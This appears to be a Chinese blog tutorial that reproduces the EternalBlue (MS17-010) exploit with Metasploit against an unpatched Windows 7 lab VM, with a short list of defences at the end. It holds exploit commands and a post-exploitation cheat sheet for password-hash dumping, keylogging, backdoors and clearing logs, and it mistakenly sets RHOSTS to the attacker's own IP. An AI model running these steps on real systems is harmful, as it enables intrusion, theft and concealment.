使用msf复现ms17-010永恒之蓝

**** 复现永恒之蓝------ms17-010****

一,环境配置:

1. kali系统(攻击机)
2.windows7(目标机)一定要确保没有安装补丁。445端口号要打开。

二,收集信息(确保属于同一网段)
1.ip地址:

攻击机:kali 192.168.43.20
目标机:win7 192.168.43.22

2. 收集方式:
获取目标机地址:192.168.43.22
我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。使用msf复现ms17-010永恒之蓝_第1张图片

获取攻击机地址:192.168.43.20
这里指kali系统的IP,在终端输入ifconfig查看。
使用msf复现ms17-010永恒之蓝_第2张图片
检测win7的445端口号是否打开
利用nmap工具检测目标机开启了哪些端口号,我们的CVE漏洞主要利用的是445端口号。

使用msf复现ms17-010永恒之蓝_第3张图片
二,配置ms17-010
使用 metasploit 软件利用 ms17-010 漏洞。
打开Metasploit软件,启动命令:

msfconsole

1. 进入meatsploit框架:

 msf6 > 表示成功进入

使用msf复现ms17-010永恒之蓝_第4张图片
2. 首先查找ms17-010所有的模块

 search ms17-010

使用msf复现ms17-010永恒之蓝_第5张图片
3.使用exploit模块

命令:
use 0
exploit/windows/smb/ms17-010

使用msf复现ms17-010永恒之蓝_第6张图片
查看exploit攻击模块中需要设置哪些参数:

show options

使用msf复现ms17-010永恒之蓝_第7张图片
配置目标机ip地址和端口号(必须是445 )
set RHOSTS 192.168.43.20
在这里插入图片描述

配置攻击机ip地址和端口号(随意),命令:
set LHOST 192.168.43.20

set LPORT 8893
在这里插入图片描述

使用msf复现ms17-010永恒之蓝_第8张图片
配置目标机的系统类型。
set target 1
使用msf复现ms17-010永恒之蓝_第9张图片
使用msf复现ms17-010永恒之蓝_第10张图片
执行攻击:run 或者 exploit
在这里插入图片描述
在这里插入图片描述
连接成功。
使用msf复现ms17-010永恒之蓝_第11张图片

成功后可以输入sysinfo查看目标机的系统信息。
使用msf复现ms17-010永恒之蓝_第12张图片
三,漏洞利用:

chcp 65001										------解决乱码问题

ps												------查看目标机进程

run vnc											------监控目标机桌面

screenshot										------截取目标机屏幕

shell											------进入目标机 cmd (添加用户,修改文件,留后门。)

clearev											------清除日志(清理自己的痕迹)

getsystem  										------ 提升权限

shell     										------  进入对方的命令终端

hashdump   										------ 获取密码hash值

keyscan_start 	 								------打开记录键盘

keyscan_dump   									------记录键盘

 keyscan_stop    								------  关闭记录键盘

四,漏洞防御
• 安装杀毒软件。
• 为windows打补丁。
• 禁用SMB1协议。
• 使用防火墙设置进/出站规则,阻止445端口号的连接。

你可能感兴趣的:(msf,安全,linux)